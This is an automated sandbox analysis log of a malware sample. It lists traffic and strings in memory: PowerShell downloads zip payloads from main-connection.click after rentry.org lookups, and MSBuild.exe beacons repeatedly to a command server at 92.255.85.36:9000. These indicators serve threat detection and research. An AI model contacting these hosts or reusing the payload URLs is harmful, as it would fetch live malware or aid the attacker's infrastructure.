Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
Source: global traffic HTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.org
Source: global traffic HTTP traffic detected: GET /archive.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.clickConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Download_StarW3_pack.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.click
Source: global traffic HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: rentry.org
Source: global traffic DNS traffic detected: DNS query: main-connection.click
Source: global traffic DNS traffic detected: DNS query: c.pki.goog
Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.255.85.36:
Source: MSBuild.exe, 0000000E.00000002.2497394754.00000000027BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.255.85.36:9000
Source: MSBuild.exe, 0000000E.00000002.2497394754.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2491991927.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P
Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.255.85.36:9000t-
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: isscint.dll.9.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: isscint.dll.9.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: isscint.dll.9.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://main-connection.click
Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0L
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rentry.org
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: isscint.dll.9.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: isscint.dll.9.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: isscint.dll.9.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: AUpdate.exe, 0000000B.00000002.1625640518.0000000009881000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004E99000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.0000000005176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: powershell.exe, 00000001.00000002.1586741158.0000022CC89E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: http://www.remobjects.com/psopenU
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
